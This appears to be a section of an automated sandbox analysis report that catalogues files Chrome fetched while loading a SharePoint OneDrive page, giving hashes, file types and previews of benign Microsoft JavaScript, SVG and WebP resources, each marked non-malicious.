                                                  Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_plus_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["plus"],{65335:function(e,t,n){(t=e.exports=n(90145)(!1)).push([e.id,'.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\={display:-ms-flexbox;display:flex;-ms-flex-direction:row;flex-direction:row;border:1px solid hsla(0,0%,100%,0);box-shadow:0 1px 2px 0 rgba(0,0,0,.1);box-sizing:border-box;width:276px;padding-left:0;align-items:flex-start;margin:0 0 17px 16px}html[dir=rtl] .o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\={margin-left:0;margin-right:16px}.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\=:hover{-webkit-box-shadow:0 8px 16px 0 rgba(0,0,0,.1);box-shadow:0 8px 16px 0 rgba(0,0,0,.1)}.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\=>button{min-width:30px;width:30px;height:36px;paddi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with CRLF, LF line terminators
                                                  Category:downloaded
                                                  Size (bytes):896
                                                  Entropy (8bit):5.3935669324256
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E1D72BAE92A3640E80F887017E27A246
                                                  SHA1:C20FA8E1786F4A1FE0216512FA4A6DF99348F7A0
                                                  SHA-256:D08AF185A83BD1736B63818F41F0E2E77BE524DC3AC90C0D394A2C6EBF47E65E
                                                  SHA-512:90B553D6E65CD73D6017AD17DAF6292668BE827801028F20565BE125ABB8BD086FE1412D0FB91DA88E859FACE2C4620D92E87832F6E8B01BEF09789BC5A4FBD8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://hidrotehnik-my.sharepoint.com/_layouts/15/odspserviceworkerproxy.aspx?swManifestName=spserviceworker&debug=false&bypass=false&navigationPreloadHeaderValue=%7B%22supportsFeatures%22%3A%5B1855%2C61313%5D%7D&dataHost=Nucleus&applications=%5B%7B%22id%22%3A%22STS%22%2C%22swPrefetchManifestName%22%3A%22stsserviceworkerprefetch%22%7D%2C%7B%22id%22%3A%22SPHome%22%7D%2C%7B%22id%22%3A%22SitePages%22%7D%2C%7B%22id%22%3A%22Embed%22%7D%2C%7B%22id%22%3A%22CreateGroup%22%7D%2C%7B%22id%22%3A%22SingleWebPart%22%7D%2C%7B%22id%22%3A%22VivaHome%22%7D%2C%7B%22id%22%3A%22BrokerLogon%22%7D%2C%7B%22id%22%3A%22Clipchamp%22%7D%2C%7B%22id%22%3A%22MeeBridge%22%7D%2C%7B%22id%22%3A%22SPStart%22%7D%2C%7B%22id%22%3A%22Agreements%22%7D%5D&list=v2&prefetchListData=true&defaultBrotli=true&authenticateFast=true&inlineAuth=v2&wwData=true&enableTheming=true&prefetchFilebrowserPageInTeams=true&FUIV9Flights=[-83099905,3]&spStartApplicationWebBundle=true&enableIntegrities=true&streamViewServerLoad=true&streamInlineScript=true"
                                                  Preview:..var _startTime=performance.now(),_startTimeTicks=Date.now();.var _shouldBypass=false;.var _cdnBaseUrl='https://res-1.cdn.office.net/files/odsp-web-prod_2024-08-23.009/';.var _swBuildNumber='odsp-web-prod_2024-08-23.009';.var _wwBuildNumber='odsp-web-prod_2024-08-23.009';.var _oneShellUrl='https://shell.cdn.office.net/api/ShellBootstrapper/business/OneShell';.var _wwKillSwitches={'48FEA7A5-5A77-480B-94EB-43F1937DF4D6':true};.var _killSwitches={"5F607A8D-6429-4962-B120-1EB1354EE6EA":true,"2ECA6C8B-E22D-4A59-9895-73D3E5800079":true};.var _prefetchBaseUrls={"stsserviceworkerprefetch":"https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/"};.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/stsserviceworkerprefetch/stsserviceworkerprefetch.js');.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2024-08-23.009/spserviceworker.js');...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1462)
                                                  Category:dropped
                                                  Size (bytes):9374
                                                  Entropy (8bit):5.31113427731954
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D1E421D34617F252A36FD386F6D4DA3A
                                                  SHA1:B86011CE0FE40B37B33FBD70DE303E16C9CBF585
                                                  SHA-256:76936229D33258664D213BF87D37C54FFA32C9E775F5F956188B543E7150B200
                                                  SHA-512:B9D6D4CBF1898C12585ED89D53DAFEC41673B6E0361F7A804C74D6CEB290CFCA0721DFD908984D159B8E2DCEB07C502FB29C59100CD6D31FE4738075961A4E0E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1055],{2568:function(e,t,n){n.d(t,{a:function(){return r}});var a=n("react-lib"),i=n(164);function r(e,t,n){var r=a.useState(t),o=r[0],s=r[1],c=(0,i.a)(void 0!==e),d=c?e:o,l=a.useRef(d),u=a.useRef(n);a.useEffect(function(){l.current=d,u.current=n});var f=(0,i.a)(function(){return function(e,t){var n="function"==typeof e?e(l.current):e;u.current&&u.current(t,n),c||s(n)}});return[d,f]}}.,3311:function(e,t,n){n.d(t,{a:function(){return i}});var a=n(3067);function i(e,t,n,i,r){return i===a.b||"number"!=typeof i?"#".concat(r):"rgba(".concat(e,", ").concat(t,", ").concat(n,", ").concat(i/a.b,")")}}.,3310:function(e,t,n){function a(e,t,n){return void 0===n&&(n=0),e<n?n:e>t?t:e}n.d(t,{a:function(){return a}})}.,3067:function(e,t,n){n.d(t,{a:function(){return f},b:function(){return s},c:function(){return i},d:function(){return o},e:function(){return a},f:function(){return r},g:function(){return d},h:function(){return
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):23004
                                                  Entropy (8bit):7.954295527779369
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:385C4E9577E00FE34C8D8C331130238B
                                                  SHA1:A54CE0445EA951461110446992048884EF96C069
                                                  SHA-256:F1841FF185A4F43BF0184C828DA1647C0DDFBEBB6BB763CD10789F9EB6A4A306
                                                  SHA-512:E8356351DF006166CF98DCE384E14CB280329E3D05DB7724050CF0605FEF03E475B0977C84F30F6CB31350BDB8CB792BA6BC604C4AADC30A01EE0971C78F6D35
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_recent_v3.webp
                                                  Preview:RIFF.Y..WEBPVP8X..............ALPH.8.....m.0I.......{z%...>l..EZm2.E.....+. .N.5K..$I.l.$.u....g...?...;..5j...}..........C.d...e...{.c....m.m..9k..c.m.2...#".g.....$9.m..g..sct....ia.....1W.,....._.........._......s..`......=..tc...0".B..M5.5..@....~....t[k..M.u.1b-...1..^,.X_.....@..`...E..e5.[.h..1Y....,....................5.....d.....y..&.=51`H....t..1.1.i..i.<6.M..|c.N.96.....%."....Zs...Y..5.2VF..e...X.=.|..k...W.%...D.@t....1.....,...24.ht.F#...,.u.v;w.4.P....t.Y..3c......s..q]YDF@w.2.16......n}.....Y[..A.EP$e7.q...6k.$......N...M...ZXc......F$..c...!........yz.b....N/..A.....T.....1.HB.;.n...m.&.09...X.ya..iM7.I t.Q*.(......B..Y..Y.5Z..b.v.S#....`.....n...@ZT..(. ...N.I..uk...b196,.......6&..(........$...].&.H0P &D.....kr_,m.`...[.i15&.kbd=L&.d.l..B.QPDA...Cz'.S.1H0.B ..B.[F.LF..bb9..2.-..2a....`9.Q.....*"(...i...3....B......<96....4.=...yy^L..8..&.."."-.A....... .#.."s........n...:..^..k..RB ...(..& .1.K.".w. @..1....Q..hXM.k
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):4199
                                                  Entropy (8bit):4.6320005497594545
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2438CDD6F5BB7731069306C5AC6B00BF
                                                  SHA1:5C70B99ABCAE66BBA4A451CC73B707C4AA049331
                                                  SHA-256:FE549E1311EE1ABC130CD94FB27FDC7BF29134160E8B103C75A741A352C6EC55
                                                  SHA-512:4E120BEE7260192F692B60EBC3A57363EFA0F0BF4F5EF03BCCC3A0DA0161056547A1A2AA130568C188D72CF63EDB1FCFD0DFA1E0587EBF3BC06D842304267A6D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/error/error_shared.svg
                                                  Preview:<svg width="160" height="160" viewBox="0 0 160 160" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1003_114986)">..<path d="M139.501 59.1L105.201 93.7C103.201 95.7 104.101 99.2 106.901 99.9L154.001 112.4C156.801 113.1 159.301 110.6 158.601 107.8L145.801 60.8C144.901 58 141.501 57 139.501 59.1Z" fill="url(#paint0_linear_1003_114986)"/>..<path d="M39.6999 19.9L19.2999 64.2C18.0999 66.8 20.1999 69.7 22.9999 69.5L71.4999 65C74.3999 64.7 75.8999 61.5 74.1999 59.1L46.0999 19.3C44.3999 16.9 40.8999 17.3 39.6999 19.9Z" fill="url(#paint1_linear_1003_114986)"/>..<path d="M78.5007 26.1L19.6007 113.4C16.1007 118.5 19.5007 125.5 25.7007 126L130.801 133.4C137.001 133.8 141.301 127.4 138.601 121.8L92.4007 27.1C89.7007 21.5 82.0007 21 78.5007 26.1Z" fill="#FFD590"/>..<path d="M80.5012 97.1C78.3012 96.9 76.6012 95 76.8012 92.8L79.7011 51.9C79.9011 49.7 81.8012 48 84.0012 48.2C86.2012 48.4 87.9011 50.3 87.7011 52.5L84.8012 93.4C84.6012 95.6 82.7012 97.2 80.5012 97.1Z" fill="wh
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (8692)
                                                  Category:downloaded
                                                  Size (bytes):14064
                                                  Entropy (8bit):5.413007495043749
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8AF53C9BA2A232BA473F3DBCA2E2F802
                                                  SHA1:E7A2BC05DB8E7ECEF019D3E557333B8222A2D73F
                                                  SHA-256:A662AB33A4A3437B3E32655E5D59A25060F4D57A459CFECA0420D8A354553D43
                                                  SHA-512:E3FC1F7CA98786064B6B442C8624AF3C179D79AE8D5E845EFC0461CE3F40255CF72ACACFE2E0A820775F6A5505F52BC7E4DBD80FFBD074C9E78EF86B75286148
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/37636.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[37636],{790599:(e,t,n)=>{n.d(t,{k:()=>d});var a=n(408156),i=n(868698),r=n(369545),o=n(671433);const s=(0,r.s)({root:{mc9l5x:"f1w7gpdv",Bg96gwp:"fez10in",ycbfsm:"fg4l7m0"},rtl:{Bz10aip:"f13rod7r"}},{d:[".f1w7gpdv{display:inline;}",".fez10in{line-height:0;}",".f13rod7r{-webkit-transform:scaleX(-1);-moz-transform:scaleX(-1);-ms-transform:scaleX(-1);transform:scaleX(-1);}"],t:["@media (forced-colors: active){.fg4l7m0{forced-color-adjust:auto;}}"]}),c=(e,t)=>{const{title:n,primaryFill:a="currentColor",...r}=e,c={...r,title:void 0,fill:a},d=s(),l=(0,i.a)();return c.className=(0,o.z)(d.root,(null==t?void 0:t.flipInRtl)&&"rtl"===(null==l?void 0:l.textDirection)&&d.rtl,c.className),n&&(c["aria-label"]=n),c["aria-label"]||c["aria-labelledby"]?c.role="img":c["aria-hidden"]=!0,c},d=(e,t,n,i)=>{const r="1em"===t?"20":t,o=a.forwardRef((e,o)=>{const s={...c(e,{flipInRtl:null==i?void 0:i.flipInRtl}),ref:o,w
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (16804)
                                                  Category:downloaded
                                                  Size (bytes):31938
                                                  Entropy (8bit):5.390847218434074
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4004D221AD333BD30004F226FE34FE2F
                                                  SHA1:48FFAC812BE46A9794AE8A76695C21DCD2F4847E
                                                  SHA-256:9DF6BC061796C9B47528B3DEA3ADD0B5130711502222718979D1D0591AD8CF59
                                                  SHA-512:00D95C445D90A1FA8E94AA4E91C3C2466200E5F374AD48098682EA0579570E2080B4CA47627EE507A2FDB85EB81144B250288B347B53FA5BE8CB03A55FDA4984
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/20.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[20],{5763:function(e,t,n){n.d(t,{a:function(){return a}});var a="-2147024860, Microsoft.SharePoint.SPQueryThrottledException"}.,4631:function(e,t,n){n.d(t,{a:function(){return y}});var a=n("tslib_102"),i=n(21),r=n(29),o=n(40),s=n(158),c=n(136),d=n(7),l=n(28),u=n(1631),f=n(258),p=n(24),m=n(10),_=n(62),h=n(105),b=n("odsp.util_460"),g=n(117);function v(e){var t=this,n=new l.a(e.endpoint).authority;return function(i){return(0,a.Zd)(t,void 0,void 0,function(){var t,r,o,s,u,v,y,S,D,I,x;return(0,a.qr)(this,function(a){switch(a.label){case 0:return t=c.a.serialize({tenantRootUrl:n}),r={endpoint:e.endpoint,tenantRootUrl:n},o=new m.a({name:"GetMyOneDriveUrl.UserOneDriveEndpoint",extraData:r}),b.HW.isActivated("810CC8F7-AE82-42B8-8625-6D144C4336AD")?[3,2]:[4,i((0,g.a)(function(e){return{spItem:e.demandItemFacet(d.a,t,{suppressGetItems:!1}),error:e.demandItemFacet(_.b,t,{suppressGetItems:!0})}}))];case 1:return S=a.sent(
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (30298)
                                                  Category:dropped
                                                  Size (bytes):105770
                                                  Entropy (8bit):5.392213533794559
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DA6B9B632467EF7189D0EA7A3DC00679
                                                  SHA1:F5116345491D55E853F46CA355F7BAC920B5EFBE
                                                  SHA-256:8FC9E3D95566966AFD16C726DEFA90826DBAF2DBB17EE3275A18B6E2764B5C19
                                                  SHA-512:15340A6BE36902AF6F61C0EC5E29835C2F7CA87FFC745999E117391DDD2145B4FCEDA64AC0261BA5E494D2A0B7CA73DEE6DAA20882E6B45EF9943820289662B7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_otellogging_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["otellogging"],{69691:function(n,t,e){var r=e(92855),i=e(41230),o=e(54800),u=e(59177),a=e(68128),c=e(78939),s=e(85788),f=e(69988),l=e(25855),d=function(n){function t(){var e=n.call(this)||this;return e.pluginVersionStringArr=[],(0,i.A)(t,e,(function(n,t){n.logger&&n.logger.queue||(n.logger=new o.wq({loggingLevelConsole:1})),n.initialize=function(e,r,i,s){(0,u.r2)(n,(function(){return"AppInsightsCore.initialize"}),(function(){var u=n.pluginVersionStringArr;if(e){e.endpointUrl||(e.endpointUrl=f.S);var l=e.propertyStorageOverride;!l||l.getProperty&&l.setProperty||(0,a.$8)("Invalid property storage override passed."),e.channels&&(0,a.Iu)(e.channels,(function(n){n&&(0,a.Iu)(n,
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1094
                                                  Entropy (8bit):4.4118612173200535
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FD36C6D34534F35EB667326780516927
                                                  SHA1:D16AB07BF1F55AD5F8D7D7EE44C8B0E2C564C5A1
                                                  SHA-256:48989250706840777F78FC839536165FEC74080CEEA49CFB7B4505082AC35684
                                                  SHA-512:DB30599037FD350DDBDFBB902B8291851FEB2C2FB3D783C71061913F2DF549693402657B5D13CF4C932A243204D375EFCACB7FF71F0C214A02AA492094AC24D3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{.. "n": 3,.. "e": [.. { "e": "atm-fp-direct.office.com", "w": 20, "m": 136 },.. { "e": "a-ring.msedge.net", "w": 20, "m": 136 },.. { "e": "b-ring.msedge.net", "w": 20, "m": 136 },.. { "e": "k-ring.msedge.net", "w": 20, "m": 136 },.. { "e": "s-ring.msedge.net", "w": 20, "m": 136 },.. { "e": "ow1.res.office365.com", "w": 20, "m": 1 },.. { "e": "afd-a-acdc-direct.office.com", "w": 20, "m": 136 },.. { "e": "afd-k-acdc-direct.office.com", "w": 20, "m": 136 },.. { "e": "acdc-direct.office.com", "w": 20, "m": 136 },.. { "e": "gtm-dyn-direct.office365.com", "w": 20, "m": 136 },.. { "e": "outlook.office365.com", "w": 20, "m": 136 },.. { "e": "outlook.office.com", "w": 20, "m": 136 },.. { "e": "outlook.live.com", "w": 20, "m": 136 },.. { "e": "substrate.office.com", "w": 20, "m": 136 },.. { "e": "*.fp.measure.office.com", "w": 1e6, "m": 128 }.. ],.. "r": ["upload.fp.measure.offic
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (22018)
                                                  Category:downloaded
                                                  Size (bytes):23413
                                                  Entropy (8bit):5.4357376774794375
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5F385C48E5D4873FDE1F35D51A7B483F
                                                  SHA1:8BAA5614EE3C45FAAA8EC8D99BB9FE460455CE8B
                                                  SHA-256:9F48D961931603A6476C17A088F25C4763E9D693D1B736089DD71F2DDB4A213C
                                                  SHA-512:A452E5B6669F7511A58A325E5F9BD032F04DD6A641F64F3BF7B35103158C87E0E0E13C39035EE21D397B3A68FFFEBB7DFCEC554771E6B073F9567CA989AF2BFF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/28580.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[28580],{428580:(e,t,n)=>{n.d(t,{z:()=>c});var a=n(408156),i=n(662221),r=n(117848),o=n(939903),s=n(527872);const c=a.forwardRef((e,t)=>{const n=(0,r.E)(e,t);return(0,o.e)(n),(0,s.mj)("useButtonStyles_unstable")(n),(0,i.z)(n)});c.displayName="Button"}.,662221:(e,t,n)=>{n.d(t,{z:()=>r});var a=n(755289),i=n(989714);const r=e=>{(0,i.a)(e);const{iconOnly:t,iconPosition:n}=e;return(0,a.wX)(e.root,{children:["after"!==n&&e.icon&&(0,a.vZ)(e.icon,{}),!t&&e.root.children,"after"===n&&e.icon&&(0,a.vZ)(e.icon,{})]})}}.,117848:(e,t,n)=>{n.d(t,{E:()=>s}),n(408156);var a=n(17025),i=n(142866),r=n(653350),o=n(107415);const s=(e,t)=>{const{size:n}=(0,o.y)(),{appearance:s="secondary",as:c="button",disabled:d=!1,disabledFocusable:l=!1,icon:u,iconPosition:f="before",shape:p="rounded",size:m=(null!=n?n:"medium")}=e,_=i.dt(u,{elementType:"span"});return{appearance:s,disabled:d,disabledFocusable:l,iconPosition:f,sha
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (22120)
                                                  Category:downloaded
                                                  Size (bytes):56140
                                                  Entropy (8bit):5.493962593030742
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:71126938B3D7C731959A8BDC32F1B558
                                                  SHA1:B6415DC8634B9FBB76D74DEAFA2777571F6019CC
                                                  SHA-256:38507CAC1E1D099702936D3A9A5EC3DCAE012198615881BC76E8A97FB2710BAD
                                                  SHA-512:BF0DF511EA5F98F2F029B764B34A3E79ACC8A96EDE26818D97E85518678C688857FB8180380AF694826F869ECC398F2ED90B40E6A0B4CAE211B3D8359450F8B2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/82.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[82],{4112:function(e,t,n){function a(e){return e&&e.webAbsoluteUrl===e.siteAbsoluteUrl}n.d(t,{a:function(){return a}})}.,3545:function(e,t,n){function a(e){var t=e.path,n=e.parentLink,a=e.filename,r=e.isContainer,o=e.shouldAllowDisplayFormUrl;if(!n||!a)return t;var s=t,c=i(n),d=r&&a&&t&&(t.indexOf(a)<0||t.indexOf(c)<0)&&-1===t.toLowerCase().indexOf("docsethome.aspx");return(!t||!o&&t.indexOf("/Forms/DispForm.aspx?ID=")>=0||d)&&(s="".concat(c,"/").concat(a)),s}function i(e){return e?e.replace(/\/Forms\/[^\/]*\.aspx$/i,"").replace(/\/[^\/]*\.aspx$/i,""):e}n.d(t,{a:function(){return i},b:function(){return a}})}.,7943:function(e,t,n){n.d(t,{a:function(){return C}});var a=n("tslib_102"),i=n(326),r=n(56),o=n("fui.util_369"),s=n(208),c=n("odsp.util_460"),d=n(996),l=n(1772),u=n(888),f=n(65),p=n(53),m=n(1496),_=n(10),h=n(54),b=["teams","sites","personal"],g="<scrubbed>",v="unknown";function y(e){if("/"===e.charAt(0)){
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (52343)
                                                  Category:downloaded
                                                  Size (bytes):52378
                                                  Entropy (8bit):5.50919795709142
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6789520F0E2B1BA1420CD273A9358B06
                                                  SHA1:A923D0C4761B9C6161EE613C525EE7E02A4CBE42
                                                  SHA-256:116B222BEA45267E72DA59C6F03370EDC9FE638420705969C225066F93AE3F08
                                                  SHA-512:1B95816C425E0BBFEB4D0A607FBF373D1E7CA50EE374E809E935378DE17C80E5567666449DFC857542BEF2AB260858A4B136DD47444F1C5C2FE745DFA5D51579
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp.aria/odsp.aria.lib-3c64dae3.js
                                                  Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.aria.lib"],{"aria-lib":function(e,t){var n,a,i,r,o;(n||(n={})).version="2.9.0",function(e){!function(e){e[e.BT_STOP=0]="BT_STOP",e[e.BT_STOP_BASE=1]="BT_STOP_BASE",e[e.BT_BOOL=2]="BT_BOOL",e[e.BT_UINT8=3]="BT_UINT8",e[e.BT_UINT16=4]="BT_UINT16",e[e.BT_UINT32=5]="BT_UINT32",e[e.BT_UINT64=6]="BT_UINT64",e[e.BT_FLOAT=7]="BT_FLOAT",e[e.BT_DOUBLE=8]="BT_DOUBLE",e[e.BT_STRING=9]="BT_STRING",e[e.BT_STRUCT=10]="BT_STRUCT",e[e.BT_LIST=11]="BT_LIST",e[e.BT_SET=12]="BT_SET",e[e.BT_MAP=13]="BT_MAP",e[e.BT_INT8=14]="BT_INT8",e[e.BT_INT16=15]="BT_INT16",e[e.BT_INT32=16]="BT_INT32",e[e.BT_INT64=17]="BT_INT64",e[e.BT_WSTRING=18]="BT_WSTRING",e[e.BT_UNAVAILABLE=127]="BT_UNAVAILABLE"}(e.BondDataType||(e.BondDataType={})),function(e){e[e.MARSHALED_PROTOCOL=0]="MARSHALED_PROTOCOL",e[e.MAFIA_PROTOCOL=17997]="MAFIA_PROTOCOL",e[e.COMPACT_PROTOCOL=16963]="COMPACT_PROTOCOL",e[e.JSON_PROTOCOL=21322]="JSON_PROTOCOL",e[e.PRETTY_JSON_PROTOCOL=2
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):16339
                                                  Entropy (8bit):4.073212105962514
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0116273C0A1FA15304056423B6FB0144
                                                  SHA1:DD57DF9094FCC4004C836E350B846115539DAE23
                                                  SHA-256:AC368FA5C1F135A0ED5F7DD60968127B0DAB9A083E4F3B2FAB3295AB713ADD9F
                                                  SHA-512:5B0ECDFD70ACFC3ABB0FC1869233E5361EF357E33D9BC5B81AD702230B0963EF5D1A8E07973EFC4CCED9DF27751B98208647F61B0EB3AEA6CE733A9CE81858FD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_meeting.svg
                                                  Preview:<svg width="220" height="220" viewBox="0 0 220 220" fill="none" xmlns="http://www.w3.org/2000/svg">..<path opacity="0.25" d="M185.218 183.932C230.241 155.6 218.338 109.019 198.587 69.2785C191.937 55.8881 193.49 31.2016 180.956 21.6823C155.916 2.66081 137.899 8.09629 122.968 25.8444C116.337 33.7231 103.094 41.1439 87.7777 36.067C72.4612 30.99 23.6921 31.0154 52.6041 89.4053C72.879 130.354 42.2747 128.448 20.5423 144.154C-0.80089 159.579 25.3844 191.231 51.2154 200.287C82.431 211.233 156.399 202.063 185.218 183.932Z" fill="#C3F3F5"/>..<path d="M200.103 55.4159L200.007 55.4053C203.301 59.691 206.644 63.9775 210.036 68.2647C206.949 90.05 205.127 111.996 204.579 133.992C204.575 134.301 204.505 134.606 204.375 134.886C204.245 135.166 204.057 135.416 203.824 135.619C203.591 135.822 203.317 135.974 203.021 136.064C202.726 136.154 202.414 136.18 202.108 136.142C183.3 134.305 164.506 132.467 145.726 130.626C145.343 130.586 144.975 130.459 144.648 130.254C144.82 130.706 145.114 131.101 145.497 13
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (5436)
                                                  Category:dropped
                                                  Size (bytes):7373
                                                  Entropy (8bit):5.337354968306107
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:980F0868D55650E08469781F6280C5C8
                                                  SHA1:9E424910FFDCD121017DC5D8239371FCCDDEC9F5
                                                  SHA-256:F0BFA989BB9B4406219981A59159EE51A169249982357D6CE8C7A061A8093FE8
                                                  SHA-512:92D2DBE866D16A8401923BC597E7CF5C11BA78ADFFAD5696E25AADBC26AC0FE324B2D969C625099773A55E1354D5C6F6DF41FACE84EFED00E866AFE71059E18A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[6,924],{3792:function(e,t,n){n.r(t),n.d(t,{getSessionToken:function(){return l}});var a=n("tslib_102"),i=n(1613),r=n(80),o=n(328),s=n(10),c=n("odsp.util_460"),d=n(1571);function l(e){var t=this;return function(n){return(0,a.Zd)(t,void 0,void 0,function(){var t,l,f,p,m,_,h,b,g,v,y,S,D,I,x,C,O,w=this;return(0,a.qr)(this,function(E){switch(E.label){case 0:if(t=e.scopes,l=void 0===t?["Files.ReadWrite.All"]:t,f=e.endpoint,p=e.driveUrl,m=e.qosExtraData,_=n((0,r.a)({graphDataSourceConfiguration:i.a,graphTokenProviderConfiguration:d.a})),h=_.graphDataSourceConfiguration,b=_.graphTokenProviderConfiguration,g=h&&h.ensureAuthToken,v=p&&h&&h.ensureAuthTokenWithAction,y=b&&b.getSessionToken,D=y?function(){return(0,a.Zd)(w,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,y({endpoint:f,driveUrl:p,path:p||f})];case 1:return[2,e.sent()]}})})}:v?function(){return(0,a.Zd)(w,void 0,void 0,
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):844
                                                  Entropy (8bit):4.7831847934380685
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6FD78F766CB66EED9146BA0D2B56F23E
                                                  SHA1:91EE2D3A76688E4435DD7583FFB4473635E07E9C
                                                  SHA-256:CEBEF91A6A00F1AF25211B2B84309272EBD0D55D28523EC58D8FEF8B64CE65FA
                                                  SHA-512:AF0E3FAC01AF09118F8D49B09D5E042F8CFD85327CE0CBDB03BF58F450118DA963155193D1F78CBF7404B710B6612F9B4CF9C0CB75CE95D48E4A0CF1AA53AA9A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/addtoonedrive/shortcutbadge_12_dark.svg
